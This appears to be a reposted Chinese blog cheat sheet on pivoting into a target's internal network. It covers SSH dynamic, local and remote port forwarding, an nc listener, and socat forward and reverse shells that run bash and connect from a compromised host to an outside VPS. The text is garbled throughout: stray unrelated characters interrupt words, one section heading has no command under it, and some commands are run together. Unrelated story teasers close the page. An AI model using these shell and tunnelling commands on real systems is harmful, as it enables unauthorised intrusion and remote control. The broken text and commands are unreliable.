穿越邊界的姿勢

轉(zhuǎn)自:https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247484014&idx=1&sn=78fcbe24a3956ed1a0bf3fba594eb0d9&chksm=ec1e3246db69bb50949eef2218344c79ec94f2ec662729a924eb788a4a47747ba0dd3750c3dc&scene=21#wechat_redirect

利用ssh建立隧道

一项钮、動態(tài)端口轉(zhuǎn)發(fā)

ssh -D 用ssh做socks代理奄侠。假設你內(nèi)網(wǎng)里某臺機器可以上網(wǎng)帆锋,但是你不能上網(wǎng),如果你有ssh到那臺機器的權(quán)限怜珍,那么就可以利用ssh方式建立一個代理socks5,通過代理來上網(wǎng)。

ssh -D[本地IP或省略]:[本地端口][登陸服務器的用戶名@服務器IP]-p[服務器ssh服務端口(默認22)]

本地執(zhí)行命令:

ssh -D1080 root@106.22.50.48

效果:本地監(jiān)聽1080端口僻焚,我們可以使用具有socks端口功能的應用芹枷,可以通過代理:127.0.0.1:1080上網(wǎng)衅疙,如果非要在目標內(nèi)網(wǎng)使用,

可以在server B上執(zhí)行:

ssh -D 1080 root@10.3.1.6

這樣我們就可以通過server B的1080端口訪問辦公網(wǎng)的資源鸳慈。如果serverB的ssh可以訪問饱溢,

可以在本地執(zhí)行:

ssh -D1080 root@222.222.222.223

這樣我們就可以通過本地127.0.0.1:1080訪問目標內(nèi)網(wǎng)資源。

二走芋、本地端口轉(zhuǎn)發(fā)

原理:將本地機(客戶機)的某個端口轉(zhuǎn)發(fā)到遠端指定機器的指定端口绩郎;本地端口轉(zhuǎn)發(fā)是在localhost上監(jiān)聽一個端口潘鲫,所有訪問這個端口的數(shù)據(jù)都會通過ssh 隧道傳輸?shù)竭h端的對應端口。

在serverB上執(zhí)行:

ssh -L7001:localhost:7070root@106.22.50.48

作用:serverB監(jiān)聽7001端口肋杖,并將7001端口的數(shù)據(jù)轉(zhuǎn)發(fā)到vps的7070端口

三溉仑、遠程端口轉(zhuǎn)發(fā)

原理:將遠程主機(服務器)的某個端口轉(zhuǎn)發(fā)到本地端指定機器的指定端口;遠程端口轉(zhuǎn)發(fā)是在遠程主機上監(jiān)聽一個端口状植,所有訪問遠程服務器的指定端口的數(shù)據(jù)都會通過ssh 隧道傳輸?shù)奖镜氐膶丝凇?br>

在serverB上執(zhí)行:

localhost: ssh -R 3306:localhost:7070 root@10.3.1.6

作用:將10.3.1.6的3306端口轉(zhuǎn)發(fā)到serverB的7070端口浊竟,這樣我們在訪問serverB的7070端口時,其實訪問到的是10.3.1.6的3306端口津畸。

獲取一個shell窗口

Python PTY shell

使用nc在vps上用監(jiān)聽4444端口:

nc -vv -l -p4444

在serverB上執(zhí)行:

socat

正向shell

vps上執(zhí)行監(jiān)聽1337端口:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

在serverB上執(zhí)行:

socat FILE:`tty`,raw,echo=0TCP:106.22.50.48:1337

反向shell

vps上執(zhí)行監(jiān)聽1337:

socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0

在serverB上執(zhí)行:

socatTCP4:106.22.50.48:1337EXEC:bash,pty,stderr,setsid,sigint,sane

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末振定,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子肉拓,更是在濱河造成了極大的恐慌后频,老刑警劉巖,帶你破解...
    沈念sama閱讀 219,366評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件暖途,死亡現(xiàn)場離奇詭異徘郭,居然都是意外死亡,警方通過查閱死者的電腦和手機丧肴,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,521評論 3 395
  • 文/潘曉璐 我一進店門残揉,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人芋浮,你說我怎么就攤上這事抱环。” “怎么了纸巷?”我有些...
    開封第一講書人閱讀 165,689評論 0 356
  • 文/不壞的土叔 我叫張陵镇草,是天一觀的道長。 經(jīng)常有香客問我瘤旨,道長梯啤,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,925評論 1 295
  • 正文 為了忘掉前任存哲,我火速辦了婚禮因宇,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘祟偷。我一直安慰自己察滑,他們只是感情好,可當我...
    茶點故事閱讀 67,942評論 6 392
  • 文/花漫 我一把揭開白布修肠。 她就那樣靜靜地躺著贺辰,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上饲化,一...
    開封第一講書人閱讀 51,727評論 1 305
  • 那天莽鸭,我揣著相機與錄音,去河邊找鬼吃靠。 笑死蒋川,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的撩笆。 我是一名探鬼主播捺球,決...
    沈念sama閱讀 40,447評論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼夕冲!你這毒婦竟也來了氮兵?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,349評論 0 276
  • 序言:老撾萬榮一對情侶失蹤歹鱼,失蹤者是張志新(化名)和其女友劉穎泣栈,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體弥姻,經(jīng)...
    沈念sama閱讀 45,820評論 1 317
  • 正文 獨居荒郊野嶺守林人離奇死亡南片,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,990評論 3 337
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了庭敦。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片疼进。...
    茶點故事閱讀 40,127評論 1 351
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖秧廉,靈堂內(nèi)的尸體忽然破棺而出伞广,到底是詐尸還是另有隱情,我是刑警寧澤疼电,帶...
    沈念sama閱讀 35,812評論 5 346
  • 正文 年R本政府宣布嚼锄,位于F島的核電站,受9級特大地震影響蔽豺,放射性物質(zhì)發(fā)生泄漏区丑。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,471評論 3 331
  • 文/蒙蒙 一修陡、第九天 我趴在偏房一處隱蔽的房頂上張望沧侥。 院中可真熱鬧,春花似錦濒析、人聲如沸正什。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,017評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春盾致,著一層夾襖步出監(jiān)牢的瞬間主经,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,142評論 1 272
  • 我被黑心中介騙來泰國打工庭惜, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留罩驻,地道東北人。 一個月前我還...
    沈念sama閱讀 48,388評論 3 373
  • 正文 我出身青樓护赊,卻偏偏與公主長得像惠遏,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子骏啰,可洞房花燭夜當晚...
    茶點故事閱讀 45,066評論 2 355

推薦閱讀更多精彩內(nèi)容